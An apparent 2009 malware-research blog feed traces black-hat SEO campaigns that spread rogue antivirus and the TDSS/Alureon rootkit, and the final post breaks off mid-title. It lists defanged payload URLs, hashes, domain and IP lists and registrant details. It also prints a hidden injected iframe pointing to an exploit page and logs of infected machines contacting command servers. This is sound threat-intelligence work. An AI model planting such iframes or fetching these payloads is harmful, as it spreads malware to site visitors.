tag:blogger.com,1999:blog-84347325988109737202011-04-21T17:45:50.722-07:00Malware Web ThreatsMalware web based threats: Anatomy of a web hack.
Mass compromise of legitimate websites - Blackhat SEO Rogue Antivirus software and zero-day exploits!Malware-Web-Threatsnoreply@blogger.comBlogger321100tag:blogger.com,1999:blog-8434732598810973720.post-52616099620802687002009-04-24T09:34:00.000-07:002009-04-24T16:29:03.688-07:00Black Hat SEO and Rogue Antivirus p.9<div style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"><table width="498" height="833" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"><tr><td width="498" height="833" valign="top"><p><span style="font-size:14px; font-weight:bold">The silent threat: Black Hat SEO and Rogue Antivirus</span><br /><br /> Massive black hat campaign still growing: Easter related websites, Ned.org, Ford and more<br /><br /></p><table width="483" height="136" border="0" cellpadding="0" cellspacing="0"><tr><td width="483"><table width="266" height="31" border="1" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC"><tr><td width="266" height="29">READ <a rel="dofollow" href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus.html" title="Black Hat SEO and Rogue Antivirus" style="color: #333">THIS page</a> if you need more information<br /></td></tr></table><p> After Trend Micro researchers claimed that Easter related sites were used to<br />redirect visitors to rogue antivirus websites, PandaLabs recently uncovered <br />similar Black hat SEO attacks against Ford and Ned.org.<br /><br />By mis-using keywords typically related to global businesses and institutions, <br />the criminals attract unsuspecting visitors to compromized web sites. These sites <br />deceive visitors into downloading and installing a fake antivirus product that is<br />very hard to deactivate or remove.The rogue antivirus gives false alerts to the <br />user making them think that theircomputer is infected. Scared users are then <br />susceptible to buying the "antivirus protection" via a page that looks like a <br />secure SSL web site. In fact, their money are confidential credit card information <br />are stolen by the criminals the moment that they enter their personal information<br />into the payment page. <br /><br />Many global companies, including Ford have been exploited in this way. Over a <br />million compromized web sites used Ford-based keywords to attract visitors to <br />fake antivirussites via search engines such as Google (<a href="http://www.brafton.com/industry-news/black-hat-seo-may-force-google-change-algorithm-$1289367.htm" target="_blank">Black hat SEO may force<br />Google to change algorithm</a>).Other examples of this attack include the mis-use<br />of Easter related keywords to attract unsuspecting visitors during the Easter <br />season (<u>Trend Micro Malware Blog</u> - <a href="http://blog.trendmicro.com/rotten-eggs-an-easter-malware-campaign/">Rotten Eggs: An Easter Malware Campaign</a>).<p>There are other variants of this type of attack originating from the same <br />Ukraine / Russianbased criminal fraternity. For example, the criminals use technical <br />exploits to compromizeweb sites, blog, forums and the like. Wordpress blog <br />management software has been a victim of such an exploit allowing the criminals<br />to inject malicious code directly into all pages.A visitor to one of these infected<br />sites will beredirected to another site where rogue antivirus software is again <br />downloaded <u> (PandaLabs</u>: <a href="http://pandalabs.pandasecurity.com/archive/New-Blackhat-SEO-attack-exploits-vulnerabilities-in-Wordpress-to-distribute-rogue-antivirus-software.aspx" target="_blank">New Blackhat SEO attack exploits vulnerabilities in <br />Wordpressto distributerogue antivirus software</a>).<p>The criminals put a lot of effort into assuring the longevity of their scam.<br />Frequent IP changes and moving from location to location help ensure that <br /> they can continue their activities.<p>You can get more information about all these attacks from the following <br />resources. The PandaLabs video gives a particularly clear and concise overview.<p> <object width="400" height="300"> <param name="allowfullscreen" value="true" /> <param name="allowscriptaccess" value="always" /><param name="movie" value="http://vimeo.com/moogaloop.swf?clip_id=4143942&server=vimeo.com&show_title=1&show_byline=1&show_portrait=0&color=&fullscreen=1" /> <embed src="http://vimeo.com/moogaloop.swf?clip_id=4143942&server=vimeo.com&show_title=1&show_byline=1&show_portrait=0&color=&fullscreen=1" type="application/x-shockwave-flash" allowfullscreen="true" allowscriptaccess="always" width="400" height="300"></embed> </object><p>The following links provide more information about this attack:<br /> <br /> <u>The Tech Herald</u>: <a href="http://www.thetechherald.com/article.php/200916/3450/Malicious-SEO-targets-Ford-Motor-Company" target="_blank">Malicious SEO targets Ford Motor Company</a><u><br /> PandaLabs</u>: <a href="http://pandalabs.pandasecurity.com/archive/Targeted-Blackhat-SEO-Attack-against-Ford-Motor-Co_2E00_.aspx" target="_blank">Targeted Blackhat SEO Attack against Ford Motor Co.</a><br /> <br /> Read the article on WebProNews: <a href="http://www.webpronews.com/topnews/2009/04/20/google-set-to-change-ranking-algorithm" target="_blank">Blackhat SEO spammers force Google’s hand</a><br /><hr /><p> <u>Related attack:<br /> <br /> PandaLabs</u>: <a href="http://pandalabs.pandasecurity.com/archive/Blackhat-SEO-Fueled-Rogue-Security-Campaign.aspx" target="_blank">Blackhat SEO Fueled Rogue Security Campaign</a><br /> <a href="http://support.us.pandasecurity.com/blog/list.txt" target="_blank">Sample hijacked search terms</a> (text file) <br /> <br /> The website implicated is: <span class="scam_website">getscanonline.com</span> (also hosted on 209.44.126.14).<br /> <br /> <u>Softpedia</u>: <a href="http://news.softpedia.com/news/Easter-and-Ford-Search-Results-Poisoned-109376.shtml" target="_blank">Easter and Ford Search Results Poisoned</a> <br /> <br />In this case, the files found on the site are detected by Trend Micro as <br /><a href="http://threatinfo.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=TROJ_FAKEAV.BAF&VSect=T" target="_blank"><br />TROJ_FAKEAV.BAF</a> - <a href="http://threatinfo.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=JS_DLOADER.WKQ&VSect=T" target="_top">JS_DLOADER.WKQ</a><br /><br />The websites in question are: <span class="scam_website">trustsecurityshield.com</span> and <span class="scam_website">topsecurity4you.com</span><br />which both have served for only two or three days (hosted on 209.44.126.14).<br /> </p>
<hr />
<br />
Technicals details can be found below<br /> <br /><br /> <u>Vulnerabilities in Wordpress exploited to distribute rogue antivirus software</u><br /> <br /> Watch the full video: <br /> <a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/SfHqRdm5YDI/AAAAAAAAAa4/R1Inb8MWasU/s1600-h/malicious-website.jpg"></a><br /> <object width="400" height="300"> <param name="allowfullscreen" value="true" /> <param name="allowscriptaccess" value="always" /> <param name="movie" value="http://vimeo.com/moogaloop.swf?clip_id=4288832&server=vimeo.com&show_title=1&show_byline=1&show_portrait=0&color=&fullscreen=1" /> <embed src="http://vimeo.com/moogaloop.swf?clip_id=4288832&server=vimeo.com&show_title=1&show_byline=1&show_portrait=0&color=&fullscreen=1" type="application/x-shockwave-flash" allowfullscreen="true" allowscriptaccess="always" width="400" height="300"></embed> </object> <br /> <br /> I will take your attention on the video above. <br /> <br /> This is a screenshot at 03:11<br /> <br /> If you zoom into it you will see the domain <span class="scam_website">"load-archive-av-pro.com".</span><br /> The domain is still active and shared with many other fake scanner websites<br />like <span class="scam_website">"antivir-scan-pro-best.com"</span> for the location of the payload. <br /><a href="http://wepawet.iseclab.org/view.php?hash=0224dbcb7d367c49e1740e20445a744e&t=1240592593&type=js" target="_blank">Wepawet Analysis</a><br /> <br /> <a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/SfHqRdm5YDI/AAAAAAAAAa4/R1Inb8MWasU/s1600-h/malicious-website.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 240px;" src="http://2.bp.blogspot.com/_9YOi_bjoDL4/SfHqRdm5YDI/AAAAAAAAAa4/R1Inb8MWasU/s320/malicious-website.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5328297419882455090" /></a><br /> <br /> <br /> The process:<br /> <br /> I will take some words found on Ned.org for example.<br /> <br /> <br /> The google cache: <br /> <br /> <a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/SfHlMWa1dWI/AAAAAAAAAaw/iP98effUwZ4/s1600-h/KettleVallyLineSong.jpg"></a> <a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/SfHlMed-0aI/AAAAAAAAAao/kzJT43E7C4E/s1600-h/Ned.org-Malware_Campaign.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 138px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/SfHlMed-0aI/AAAAAAAAAao/kzJT43E7C4E/s320/Ned.org-Malware_Campaign.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5328291836656013730" /></a> <br /> <br /> The poisoned keywords: <br /> <br /> "Kettle Vally Line Song"<br /> <br /> <br /> The google search:<br /> <br /> <a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/SfHlMWa1dWI/AAAAAAAAAaw/iP98effUwZ4/s1600-h/KettleVallyLineSong.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 190px;" src="http://2.bp.blogspot.com/_9YOi_bjoDL4/SfHlMWa1dWI/AAAAAAAAAaw/iP98effUwZ4/s320/KettleVallyLineSong.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5328291834495333730" /></a> <br /> <br /> The redirection analysis:<br /> <br /> <span class="scam_website">hxxp://cropperddi.fortunecity.com/6766.html</span> <br /> <span class="scam_website">hxxp://sandbergjbo.fortunecity.com/26894.html</span> <br /> <br /> <a href="http://wepawet.iseclab.org/view.php?hash=fa5c5fea775ed795a7f6bdd131ec5c86&t=1240589203&type=js" target="_blank">Analysis</a> -> redirect to a traffic management system<br /> <a href="http://wepawet.iseclab.org/view.php?hash=e47a21c33d6df03738d0dbcfdba418f8&t=1240589619&type=js" target="_blank">Analysis</a> -> redirect to a traffic management system <br /> <br /> <span class="scam_website">hxxp://redirxl.com/filt/in.cgi?5&group=5q</span> <br /> <br /> which then redirect to the malicious site<br /> <br /> <span class="scam_website">hxxp://antivir-scan-pro-best.com/11038/3/</span> <br /> <br /> The payload in located on the same site that appear on the <br />
PandaLabs article
which is:<br />
<br /> <span class="scam_website">hxxp://files.load-archive-av-pro.com/normal/<br />
setup_11038_3_1.exe</span> <br />
<br /> File size: 104971 bytes <br /> MD5...: 2a9889219ec9d0124892e5e64eaed2bd<br /> <br /> <a href="http://www.virustotal.com/analisis/4e66a86232471aefaa52aa7b4d886ddf" target="_blank">VirusTotal </a><br /> <a href="http://anubis.iseclab.org/?action=result&task_id=1151c650ee74a1834913f5939e6f02f4d" target="_blank">Anubis</a><br /> <br /> ---------------------------<br /> <br /> 64.69.32.220<br /> <br /> <span class="scam_website">antivir-scan-pro-best.com</span> <br /> <br /> <p>Registrant: Lee Brinkman (leebrinkm@gmail.com)<br /> 4396 Ross Street<br /> Mount Vernon<br /> Illinois,62864<br /> US<br /> Tel. +001.65746675653</p> <p>Creation Date: 17-Apr-2009 <br /> Expiration Date: 17-Apr-2010</p> <p>Domain servers in listed order:<br /> <span class="scam_website">ns2.antivir-scan-pro-best.com<br /> ns1.antivir-scan-pro-best.com</span><br /><br /> Registrar: <br /> DIRECTI INTERNET SOLUTIONS PVT. LTD. <br />
D/B/A PUBLICDOMAINREGISTRY.COM<br /><br /> Also on this IP - previously used<br /><br /><span class="scam_website">checker-pc-pro-av.com</span><br /><span class="scam_website">sheck-pro-as.com</span><br /><br /><a href="http://4.bp.blogspot.com/_9YOi_bjoDL4/SfH1TrxqlnI/AAAAAAAAAbA/nj9tRQ7Ni-g/s1600-h/64.69.32.220.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 79px;" src="http://4.bp.blogspot.com/_9YOi_bjoDL4/SfH1TrxqlnI/AAAAAAAAAbA/nj9tRQ7Ni-g/s320/64.69.32.220.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5328309552673363570" /></a> <br /> </p>---------------------------<br /><br />195.88.80.127 - ECOWEB AS35695 - ecoweb.lv <br /><br /><span class="scam_website">load-archive-av-pro.com</span> <br /><span class="scam_website">files.load-archive-av-pro.com</span> <br /><br /><p>Registrant:Mary Smalls (mary.sma0@gmail.com)<br />2251 Doctors Drive<br />Los Angeles<br />California,90066<br />US<br />Tel. +001.86758776498</p><p>Creation Date: 17-Apr-2009 <br />Expiration Date: 17-Apr-2010</p><p>Domain servers in listed order:<br /><span class="scam_website"> ns2.load-archive-av-pro.com<br /> ns1.load-archive-av-pro.com</span></p>Registrar: <br /> DIRECTI INTERNET SOLUTIONS PVT.
LTD. <br />
D/B/A PUBLICDOMAINREGISTRY.COM<br /><br />Also on this IP - previously used<br /><br /><span class="scam_website">download-pro-as.net<br />load-antivir-pro-pc.com<br />files.load-antivir-pro-pc.com <br />download-pro-as.net<br /></span> <br /><br /><a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/SfH2HYaxJCI/AAAAAAAAAbI/h-23PrUxteo/s1600-h/195.88.80.127.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 77px;" src="http://2.bp.blogspot.com/_9YOi_bjoDL4/SfH2HYaxJCI/AAAAAAAAAbI/h-23PrUxteo/s320/195.88.80.127.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5328310440830247970" /></a> <br /><br />
<hr />
<br /><p>From the article on PandaLabs' blog about the SEO attack against <br />
Ford Motor Co.
you can see the domain "globextubes.com" <br />
previously hosted on 64.69.32.203. <br />
<br />This is a graph (from Robtex) of some of these sites serving in <br />
the same campaign:<br /><br /><span class="scam_website">fasttube2009.com<br /> globalstube2009.com <br /> globextubes.com <br /> streamingtubes2009.com<br /> </span> <br /><a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/SfHYPSAqfNI/AAAAAAAAAag/lq9vnYHWjPQ/s1600-h/globextubes-com.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 190px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/SfHYPSAqfNI/AAAAAAAAAag/lq9vnYHWjPQ/s320/globextubes-com.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5328277591200267474" /></a> <br /><br /><a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/SfHYPSAqfNI/AAAAAAAAAag/lq9vnYHWjPQ/s1600-h/globextubes-com.jpg"><br /> </a>This is a file found on one of these site: softwarefortubeview.40011.exe<br /><br /><a href="http://www.virustotal.com/analisis/b9ea2d9d4de565169edefc76ba5a4f41" target="_blank">VirusTotal Report</a><br /><a href="http://anubis.iseclab.org/?action=result&task_id=108520c93bee5c77409bc8b7bdc146008" target="_blank">Anubis Report</a><br /><br /><br /><br />Complete analysis below:<br /><br />After running it connect to this URL to received additional payloads to inject.<br /><br /><span class="scam_website">nhgfngfdhngf.com</span> - 216.240.148.9 <br /><br /><a href="http://www.threatexpert.com/report.aspx?md5=103021a16beecf19b5b45f4d238d8173" target="_blank">ThreatExpert Report</a><br /><br /><span class="scam_website">hxxp://nhgfngfdhngf.com/fff9999.php?aid=0&uid=00cd1a40d41d8<br />cd98f00b204e9800998ecf8427e&os=512<br /><br />hxxp://nhgfngfdhngf.com/eee9999.php?aid=0&uid=00cd1a40d41d<br />8cd98f00b204e9800998ecf8427e&os=512 <br /></span> <span class="scam_website"><br />(216.240.148.9)</span><br /><br />The page show these URL (Added file info and virustotal report) <br /><br />---------------------------------------------------- <br /><span class="scam_website">hxxp://images2009best.com/perce/<br />30f07cdd01ead4f0dd74319d888cfdd9386f80b04bf230<br />740e19c810803919c83e9c9f487472375ee/70e/perce.jpg <br /></span> <br /><a href="http://www.virustotal.com/analisis/40a7052911f921606d09c46ceb188576" target="_blank">VirusTotal</a> - 4/40 (10%)<br /><a href="http://anubis.iseclab.org/?action=result&task_id=15e23cab221b44bd43dc9a97270ea4f7d&format=html" target="_blank">Anubis Report</a><br />File size: 94212 bytes <br />MD5...: e49048a38d0757b92a34dff6fc3b3f74 <br /><br />HTTP Activity: <br /><br /><textarea name="textarea" cols="45" rows="6">
216.240.157.91 [imagesrepository.com]
Request: POST /resolution.php
88.214.205.8 [zone-searching.com]
Request: POST /borders.php </textarea><br /><p>---------------------------------------------------- <br /><br /><span class="scam_website">hxxp://venerapictures.com/item/6000dc4d413ac4f08d<br /> c431fdc85ccde9d80ff0a04b824084feb9c840903939083e0<br /> c4f78441277ced/b0b/item.gif <br /> </span> <br /><a href="http://www.virustotal.com/analisis/c643225fd027afeabff3baec75f21e8e" target="_blank">VirusTotal</a> - 7/40 (17.5%)<br /><a href="http://anubis.iseclab.org/?action=result&task_id=1e3ed412e325a0ff4c963af2a626838df" target="_blank">Anubis Report</a><br />File size: 145412 bytes<br />MD5...: d2b451fee4f7c42b06121cf03f8ea281<br /><br />---------------------------------------------------- <br /><span class="scam_website">hxxp://venerapictures.com/werber/900/216.jpg</span><br /><br /><a href="http://www.virustotal.com/analisis/2f9385b2d31e24fbd2b8337303a02f8f" target="_blank">VirusTotal</a> - 8/40 (20%)<br /><a href="http://anubis.iseclab.org/?action=result&task_id=17ce261f3dabfa6a4a9e179c280a453e7" target="_blank">Anubis Report</a><br />File size: 99332 bytes <br />MD5...: 5bc8a73f3412c574909e5f3c193fed89 <br /><br />---------------------------------------------------- <br /><span class="scam_website">hxxp://files.get-fails-load-av.com/exe/setup_200002.exe</span><br /><br /><a href="http://www.virustotal.com/analisis/1d973e01b69d2df97f03c7ca1e27e686" target="_blank">VirusTotal</a> - <span id="porcentaje">9/40 (22.5%)</span><br /><a href="http://anubis.iseclab.org/?action=result&task_id=104332b7aecf7fc942900f07c2e72a297" target="_blank">Anubis Report</a><br />File size: 78347 bytes<br />MD5...: ff220534519a1a116dbc2dd712bff24a <br /><br />HTTP Activity: <br /><br /><textarea name="textarea" cols="45" rows="4">
195.88.81.116 [dl.scan-anti-spy-4free.com]
195.88.80.207 [int.reporting32.com]
</textarea><br />
---------------------------------------------------- <br /><br /><span class="scam_website">hxxp://lwl-softwares.com/939.exe </span><br /><br /><a href="http://www.virustotal.com/analisis/134aceb45f081d0de75823c042925bd6" target="_blank">VirusTotal</a> - 0/39 (0%)<br /><a href="http://anubis.iseclab.org/?action=result&task_id=1ef8a5604aabc7dc49d6fa8cba2f96ae8" target="_blank">Anubis Report</a><br />File size: 180224 bytes <br />MD5...: 1ff562c02c68f0a8001135dc89b4eaa1 <br /><br />HTTP Activity: <br /><br /><textarea name="textarea2" cols="45" rows="16">
78.47.186.162 [hitmidpoint.com]
Request: GET /?accs=939&
tid=100
84.243.252.87 [staritquick.com]
Request: GET /in.cgi?9&
gai=cspsa3p&gli=273&
gff=cs_221227254&al=
89.248.168.46 [toppromooffer.com]
Request: GET /srm/adv/142/?a=
cspsa3p&l=273&f=
cs_221227254&ex=&
ed=&sub=csp&prodabbr=USRM </textarea><br /><br />----------------------------------------------------<br /><br /><span class="scam_website">hxxp://lwl-softwares.com/important.exe</span><br /><br /><a href="http://anubis.iseclab.org/?action=result&task_id=176525f12bcb68e0495d6997859873e21" target="_blank">Anubis Report</a><br />File size: 135168 byte<br />MD5...: 83b4560333601224cb0d5709bdf57191 <br /><br />Trojan.Win32.Tibs<br /></p></td></tr><tr><td> </td></tr></table></td></tr></table></div><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-7584836-2");pageTracker._trackPageview();} catch(err) {}</script><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8434732598810973720-5261609962080268700?l=malware-web-threats.blogspot.com' alt='' /></div>Malware-Web-Threatsnoreply@blogger.comtag:blogger.com,1999:blog-8434732598810973720.post-67458827427674388492009-04-20T16:18:00.000-07:002009-04-20T16:20:02.767-07:00Black Hat SEO and Rogue Antivirus p.8<div style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"><table width="560" height="833" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"><tr><td width="572" height="833" valign="top"><p><span style="font-size:14px; font-weight:bold">The silent threat: Black Hat SEO and Rogue Antivirus</span><br /><br /> Fake Antivirus + Rootkit TDSS / Alureon / DNSChanger Trojan<br /><br /></p><table width="510" height="136" border="0" cellpadding="0" cellspacing="0"><tr><td width="510"><table width="266" height="31" border="1" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC"><tr><td width="266" height="29">READ <a rel="dofollow" href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus.html" title="Black Hat SEO and Rogue Antivirus" style="color: #333">THIS page</a> if you need more information<br /></td></tr></table><p> A quick move to this IP block 209.44.126.0/24 by "Netelligent Hosting Services Inc" which hosts several fake av websites as well as exploits to spread the trojan TDSS/Alureon.<br /><br />All of these have been found following iframe injected on legit websites, poisoned keyworks in Google Search Engine and links on ad network (screenshot below)<br /><br /><hr />Check it out - <em>maybe someone have access to your PC right now</em>! Protect yourself.<br /><br />Also Google show <a href="http://www.google.com/search?q=%22maybe+someone+have+access+to+your+PC+right+now!%22" target="_blank">14,800 result</a> for this phrase.<br /><br /><img style="cursor:pointer; cursor:hand;width: 320px; height: 69px;" src="http://2.bp.blogspot.com/_9YOi_bjoDL4/Sev0LRaDTVI/AAAAAAAAAYw/_arUL0B8HtU/s320/basevirusscan.com-fake-ad.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5326619458784152914" /> <br /><br />Detection:<br /><br />Trojan TDSS<br />Trojan DNSChanger<br />Trojan Kryptik<br />Trojan FakeSpyGuard<br />Trojan InternetAntivirusPro<br /><br />Sites serving for the fake antivirus campaign:<br /><br /><b>209.44.126.14</b><p>activesecurityshield.com <br />anytoplikedsite.com <br />basevirusscan.com <br />bestfiresfull.com <br />bestsecurityupdate.com <br />checkonlinesecurity.com<br />cleanyourpcspace.com <br />destroyvirusnow.com <br />fastsecurityscan.com <br />fastviruscleaner.com <br />firstscansecurity.com <br />fuc*moneycash.com <br />fullandtotalsecurity.com <br />fullsecurityshield.com <br />getpcguard.com <br />getscanonline.com <br />getsecuritywall.com <br />greatsecurityshield.com <br />inetsecuritycenter.com <br />initialsecurityscan.com <br />mostpopularscan.com <br />myfirstsecurityscan.com <br />mytoplikedsite.com<br />mytopvirusscan.com <br />onlinescandetect.com <br />onlinescanservice.com <br />popularpcscan.com <br />runpcscannow.com <br />scanalertspage.com <br />scanbaseonline.com <br />scanprotectiononline.com<br />scanvistanow.net <br />securityscan4you.com <br />securitytopagent.com<br />thegreatsecurity.com <br />todaybestscan.com<br />topsecurity4you.com <br />topsecurityapp.com <br />topsoftscanner.com <br />totalpcdefender.com<br />totalvirusdestroyer.com <br />truescansecurity.com <br />trustsecurityshield.com <br />upyoursecurity.com <br />virustopshield.com<br />vistastabilitynow.com <br />vistastabilitynow.net <br />websecuritymaster.com <br />websecurityvoice.com <br />yourstabilitysystem.com <br /><br /><b>209.44.126.16</b><br />systemsecurityonline.com<br />systemsecuritytool.com<br /></p><p><b>209.44.126.29</b><br />individualpeople.biz (will be analyzed below)<br /><br /><b>209.44.126.14<br />209.44.126.15<br />209.44.126.16<br />209.44.126.17<br />209.44.126.22<br />209.44.126.23</b><br /><br />NS for rogue fake av websites <br /><br /><b>209.44.126.32</b><br />asmmnation.com<br /><a href="http://www.threatexpert.com/report.aspx?md5=3857827a43ea245009dd7d4bcd89f931" target="_blank">ThreatExpert report</a><br />In conjunction with an IP in ukraine : <a href="www.symantec.com/security_response/writeup.jsp?docid=2009-041208-1533-99&tabid=2" target="_blank">Symantec write up</a><br /></p><hr /><p><br />On this IP <b>209.44.126.29</b> we also have a couple of page with exploits which leads to the trojan TDSS (Alureon).<br /><br />I will take this domain for example "individualpeople[.]biz"<br /></p> Malicious script (IFRAME) inserted. <a href="http://wepawet.cs.ucsb.edu/view.php?hash=20ed2f4e9b82bc72da58403395eecc90&t=1240077587&type=js" target="_blank">Redirection Analysis</a><br /><br /><table width="383" height="63" border="1" cellpadding="0" cellspacing="0"><tr> <td width="379" height="61" style="padding:15px"><iframe src="hxxp://individualpeople.biz/go.php?sid=1" width="0" height="0" frameborder="0"></iframe></td></tr></table> <p><a href="http://anubis.iseclab.org/?action=result&task_id=1e8af8bd022f9e66431efbb45a537c02e" target="_blank"></a>Redirects to the page below which host several exploits. <a href="http://wepawet.cs.ucsb.edu/view.php?hash=ba7be5413ac16dab6608f2373a32b615&t=1240196375&type=js" target="_blank">Javascript Analysis</a> (Wepawet)<br /></p><table width="372" height="63" border="1" cellpadding="0" cellspacing="0"><tr> <td width="368" height="61" style="padding:15px">hxxp://individualpeople.biz/go.php?sid=6</td></tr></table> <br /> <a href="http://anubis.iseclab.org/?action=result&task_id=1e8af8bd022f9e66431efbb45a537c02e" target="_blank">Anubis Report</a><br /><br /><table width="372" height="63" border="1" cellpadding="0" cellspacing="0"><tr> <td width="368" height="61" style="padding:15px">hxxp://209.44.126.30/unsecurity/pdf.php</td> </tr></table><br /><a href="http://wepawet.cs.ucsb.edu/view.php?type=js&hash=929b20cc7a4033457630858487bbfc7e&t=1240078681">Wepawet Analysis</a> - <a href="http://www.virustotal.com/analisis/763688a5e2cd02d43d6de933354f63be" target="_blank">VirusTotal</a><br /><br />to finally load this page <br /><br /><table width="339" height="48" border="1" cellpadding="0" cellspacing="0"><tr><td width="335" height="46" style="padding:15px">hxxp://209.44.126.30/unsecurity/load.php</td></tr></table><br /><a href="http://www.virustotal.com/analisis/4ea0b7a64405a26f6c50f91fb6792c17" target="_blank">VirusTotal</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=1aab3383fb44f06d419479c2396b7b47f" target="_blank">Anubis</a><br /><br />Detections:<br /><br />W32/Alureon.B!Generic<br />Win32.Rootkit.TDSS.eyj.4<br />Packed.Win32.Tdss.f<br />Trojan.Win32.FakeSpyguard<br />Trojan:Win32/Alureon.gen!J<br />Trojan/Fakealert.gen <br /><br />--------------------------------------<br /><br />HTTP activity after infection<br /><br />92.48.91.145:80 - [trafficstatic.net] <br /><br />Request: GET /banner/crcmds/main <br />Response: 200 "OK" <br />Request: GET /banner/crcmds/init <br />Response: 200 "OK" <br />Request: GET /banner/uacsrcr.dat <br />Response: 200 "OK" <br />Request: GET /banner/crcmds/update <br />Response: 200 "OK" <br />Request: GET /banner/crfiles/uacd <br />Response: 200 "OK" <br />Request: GET /banner/crfiles/uacc <br />Response: 200 "OK" <br />Request: GET /banner/crfiles/uaclog <br />Response: 200 "OK" <br />Request: GET /banner/crfiles/uacmask <br />Response: 200 "OK" <br />Request: GET /banner/crfiles/uacserf <br />Response: 200 "OK" <br />Request: GET /banner/crcmds/types/standart <br />Response: 404 "Not Found" <br />Request: GET /banner/crcmds/types/standart <br />Response: 404 "Not Found" <br />Request: GET /banner/crcmds/types/standart <br />Response: 404 "Not Found" <br />Request: GET /banner/crcmds/affids/11 <br />Response: 404 "Not Found" <br />Request: GET /banner/crcmds/affids/11 <br />Response: 404 "Not Found" <br />Request: GET /banner/crcmds/affids/11 <br />Response: 404 "Not Found" <br />Request: GET /banner/crcmds/subids/v3072 <br />Response: 404 "Not Found" <br />Request: GET /banner/crcmds/subids/v3072 <br />Response: 404 "Not Found" <br />Request: GET /banner/crcmds/subids/v3072 <br />Response: 404 "Not Found" <br />Request: GET /banner/crcmds/builds/bbr <br />Response: 200 "OK" <br />Request: GET /banner/crfiles/uacbbr <br />Response: 200 "OK" <br /><br />72.233.114.126:80 - [statsanalist.cn] <br /><br />Request: GET /?gd=KCo7MD8uPS4iPA==&affid=Xl4=&subid=GVxfWF0=&prov=Xw==&mode=cr&v=5 <br />Response: 200 "OK" <br />Request: GET /?gd=ICQwJiE8Oy4jIw==&affid=Xl4=&subid=GVxfWF0=&prov=Xl9fXl8=&mode=cr&v=5 <br />Response: 200 "OK" <br /><br /><hr /> IPs implicated:<br /><br />209.44.126.14<br />209.44.126.15<br />209.44.126.16<br />209.44.126.17<br />209.44.126.22<br />209.44.126.23<br />209.44.126.29<br />209.44.126.32 <br /><br />Other domain in conjunction can be found using ThreatExpert<br /><br /><a href="http://www.threatexpert.com/reports.aspx?find=banner%2Fcrcmds%2Fmain" target="_blank">/banner/crcmds/main</a><br /><br /><a href="http://www.threatexpert.com/report.aspx?md5=aa0358f54817c3f8c143ade90f228c5b" target="_blank">Report 1</a><br /><a href="http://www.threatexpert.com/report.aspx?md5=1d3b847cc5a235142acd32d1deba6aff" target="_blank">Report 2</a><br /><br /><p>92.48.91.144<br />trafficstatic.com<br />explorerex.com<br />windowslogonex.com</p><p>92.48.91.145<br />trafficstatic.net<br /><a href="http://www.threatexpert.com/report.aspx?md5=100b5b3f6cfef4c9290a3a7cbd5a58a4" target="_blank">ThreatExpert Report</a></p><p>95.211.14.159<br />golddiggero1.com</p><p>76.76.103.162<br />webieupdate.net</p><p>94.76.208.32<br />symupdate2.com<br /><a href="http://www.threatexpert.com/report.aspx?md5=51bb024c51975821b307cdeecb070b0b" target="_blank">ThreatExpert Report</a></p><p>72.233.114.125<br />webnicrisoft.net<br /><a href="http://www.threatexpert.com/report.aspx?md5=51bb024c51975821b307cdeecb070b0b" target="_blank">ThreatExpert Report</a></p><p>64.213.140.254<br />webmsupdate.net<br /><a href="http://www.threatexpert.com/report.aspx?md5=51bb024c51975821b307cdeecb070b0b" target="_blank">ThreatExpert Report</a><br /></p></td></tr><tr><td> </td></tr></table></td></tr></table></div><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-7584836-2");pageTracker._trackPageview();} catch(err) {}</script><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8434732598810973720-6745882742767438849?l=malware-web-threats.blogspot.com' alt='' /></div>Malware-Web-Threatsnoreply@blogger.comtag:blogger.com,1999:blog-8434732598810973720.post-32446320936023593342009-04-20T02:05:00.000-07:002009-04-20T16:07:51.240-07:00Black Hat SEO - RBN Hacks, p.4<div style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"><table width="502" height="833" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"><tr><td width="502" height="833" valign="top"><p><span style="font-size:14px; font-weight:bold">The silent threat: Black 